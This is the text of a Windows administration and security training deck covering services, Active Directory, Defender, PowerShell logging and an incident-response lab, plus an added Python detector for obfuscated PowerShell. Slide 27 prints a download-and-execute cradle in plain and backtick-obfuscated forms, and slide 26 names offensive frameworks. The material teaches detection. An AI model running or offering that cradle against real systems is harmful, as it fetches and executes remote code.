SUMMARY History End of life CLI Services Security Considerations - PowerPoint PPT Presentation

  1. SUMMARY ▶ History ▶ End of life ▶ CLI ▶ Services ▶ Security Considerations ▶ PowerShell ▶ Incident Response

  2. BRIEF HISTORY (WINDOWS CLIENT) ▶ MSDOS (1980) ▶ WINDOWS (1985) ▶ WINDOWS 3.1 (1992) ▶ Windows 95 (1995) ▶ Windows ME (2000) ▶ Windows XP (2001) ▶ Windows Vista (2006) ▶ Windows 7 (2009) ▶ Windows 8 (2012) ▶ Windows 10 (2015)

  3. BRIEF HISTORY (WINDOWS SERVER) ▶ Windows NT (1993) ▶ Windows NT 4.0 (1996) ▶ Windows Server 2003 ▶ Windows Server 2008 ▶ Server 2012 ▶ Server 2016 ▶ Server 2019 (2018)

  4. MARKET SHARE

  5. END OF LIFE ▶ Windows 7 (2020) ▶ Windows 8.1 (2023)

  6. END OF LIFE

  7. KERNEL TYPES

  8. KERNEL

  9. COMMAND LINE INTERFACE (CLI)

  10. COMMAND LINE INTERFACE (CLI)

  11. SERVICES *Fixes 99% of printer problems

  12. WINDOWS SERVER

  13. SERVER CORE

  14. ACTIVE DIRECTORY (AD)

  15. ACTIVE DIRECTORY (AD)

  16. DOMAIN NAME SERVICE (DNS)

  17. DYNAMIC HOST CONFIGURATION PROTOCOL (DHCP)

  18. FILE TRANSFER PROTOCOL (FTP)

  19. INTERNET INFORMATION SERVICES (IIS)

  20. SERVER MESSAGE BLOCK (SMB)

  21. DOMAIN NAME SERVICE (DNS)

  22. GROUP POLICY OBJECTS (GPO)

  23. SECURITY CONSIDERATIONS

  24. WINDOWS DEFENDER ▶ Built into Windows ▶ Behavior based/Signature based

  25. WINDOWS DEFENDER

  26. POWERSHELL BASED EXPLOITATION ▶ "Living off the land" ▶ Open Source Tools ▶ Bloodhound ▶ Empire (BC-Security Branch) ▶ Powerup ▶ PoshC2 ▶ Death Star ▶ https://github.com/PowerShellMafia ▶ And more…

  27. OBFUSCATION AND POWERSHELL ▶ -nop == -nopr == -noprof == -noprofile ▶ Invoke-Expression (New-Object Net.WebClient).DownloadString("htt" + "ps://" + "bit.ly/sample") == ▶ `I`N`V`o`k`e`-`E`x`p`R`e`s`s`i`o`N (& (`G`C`M *w-O*) "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"('ht'+'tps://bit.ly/sample')

  28. POWERSHELL EXECUTION POLICIES ▶ Not intended to be a security feature

  29. POWERSHELL LOGGING ▶ Only possible in V5 ▶ Very powerful
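To connect the obfuscation tricks on slide 27 with the script block logging slide 29 praises, here is an added Python example (not from the presentation) that normalizes a logged script block the way a detection rule would and flags a download cradle hidden behind backticks, string concatenation, quoted member names and wildcard command lookup. The sample script blocks are constructed, and the slide's URL is replaced by a placeholder host.

```python
import re

# Constructed sample script-block texts, modelled on the message body of a
# PowerShell Script Block Logging event (Event ID 4104); not the slides' logs.
SAMPLES = {
    "benign": 'Get-Service | Where-Object Status -eq "Running"',
    "backtick": ("`I`N`V`o`k`e`-`E`x`p`R`e`s`s`i`o`N (& (`G`C`M *w-O*) "
                 "\"`N`e`T`.`W`e`B`C`l`i`e`N`T\").\"`D`o`w`N`l`o`A`d`S`T`R`i`N`g\""
                 "('ht'+'tps://example.invalid/sample')"),
}
# Substrings a download cradle leaves behind once the obfuscation is undone.
CRADLE_TOKENS = ("invoke-expression", "downloadstring", "net.webclient")
# Two quoted literals joined by '+': PowerShell evaluates this to one string.
_CONCAT = re.compile(r"""(['"])([^'"]*)\1\s*\+\s*(['"])([^'"]*)\3""")
# A quoted member name: ."DownloadString"( is the same call as .DownloadString(
_QUOTED_MEMBER = re.compile(r"""\.\s*(['"])([A-Za-z_]\w*)\1""")
# Wildcard command lookup (gcm *w-O* resolves New-Object) hides the cmdlet name.
_WILDCARD_LOOKUP = re.compile(r"\b(gcm|get-command)\s+\*", re.I)

def normalize(script_block: str) -> str:
    # Undo the slide's cheap obfuscations so plain signatures match again.
    # Heuristic: backticks are dropped wholesale (this also removes real escapes
    # such as `n), which is fine for matching the text, never for re-running it.
    text = script_block.replace("`", "")
    while True:  # repeat so 'a'+'b'+'c' collapses fully
        text, n = _CONCAT.subn(lambda m: m[1] + m[2] + m[4] + m[1], text)
        if n == 0:
            break
    text = _QUOTED_MEMBER.sub(r".\2", text)
    return re.sub(r"\s+", " ", text).casefold()

def obfuscation_signals(script_block: str) -> dict:
    # Count the tricks themselves; they are evidence even before any match.
    stripped = script_block.replace("`", "")
    return {
        "backticks": script_block.count("`"),
        "string_concats": len(_CONCAT.findall(stripped)),
        "quoted_members": len(_QUOTED_MEMBER.findall(stripped)),
        "wildcard_lookup": _WILDCARD_LOOKUP.search(stripped) is not None,
    }

def analyze(script_block: str) -> dict:
    # Classify one logged script block: cradle present, obfuscated, severity.
    normalized = normalize(script_block)
    cradle = [t for t in CRADLE_TOKENS if t in normalized]
    signals = obfuscation_signals(script_block)
    obfuscated = (signals["backticks"] >= 5 or signals["string_concats"] > 0
                  or signals["quoted_members"] > 0 or signals["wildcard_lookup"])
    severity = "high" if cradle and obfuscated else "medium" if cradle else "low"
    return {"normalized": normalized, "cradle_tokens": cradle, "signals": signals,
            "obfuscated": obfuscated, "suspicious": bool(cradle), "severity": severity}
```

Running analyze over the Message field of each 4104 event gives a normalized string to match against plain signatures, plus the obfuscation counts that justify escalating an otherwise ordinary-looking cradle.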

  30. TOPPLING THE EMPIRE

  31. WHEN SIGNATURE DETECTION FAILS

  32. BEHAVIOR DETECTION SUCCEEDS

  33. WINDOWS DEFENDER + GROUP POLICIES

  34. WINDOWS DEFENDER + GROUP POLICIES

  35. POWERSHELL COMMANDS ▶ Get-Service ▶ Lists services running or stopped

  36. POWERSHELL COMMANDS ▶ Start-Service <servicename> ▶ Stop-Service <servicename> ▶ Start/Stop service ▶ Ex. Start-Service DNS

  37. POWERSHELL COMMANDS ▶ sc.exe start <servicename> ▶ sc.exe stop <servicename> ▶ Start/Stop service

  38. POWERSHELL COMMANDS ▶ Set-Service -Name <serviceName> -StartupType <startupType> ▶ Automatic (Delayed) ▶ Automatic ▶ Manual ▶ Disabled

  39. POWERSHELL COMMANDS ▶ Get-MpComputerStatus ▶ Gets the status of antimalware software on the system

  40. POWERSHELL COMMANDS ▶ Get-Process ▶ List processes

  41. POWERSHELL COMMANDS ▶ Clear ▶ Clear screen

  42. POWERSHELL COMMANDS ▶ More info https://docs.microsoft.com/en-us/powershell/

  43. INCIDENT RESPONSE Hands on

  44. SCENARIO ▶ Device: 1x breached Active Directory Server ▶ Brute force attack detected by intrusion detection system on 9/9/2020 at 0900 EST ▶ Defender scan ran following the attack, no malicious programs found ▶ Credentials ▶ Username: NIMITZ\Administrator ▶ Password: Change.me!

  45. RELEVANT EVENT LOGS

  46. EVENT LOG

  47. EVENT LOG

  48. EVENT LOG

  49. EVENT LOG

  50. EVENT LOG

  51. EVENT LOG

  52. RELEVANT POWERSHELL LOGS

  53. POWERSHELL LOGS

  54. POWERSHELL LOGS

  55. POWERSHELL LOGS

  56. POWERSHELL LOGS
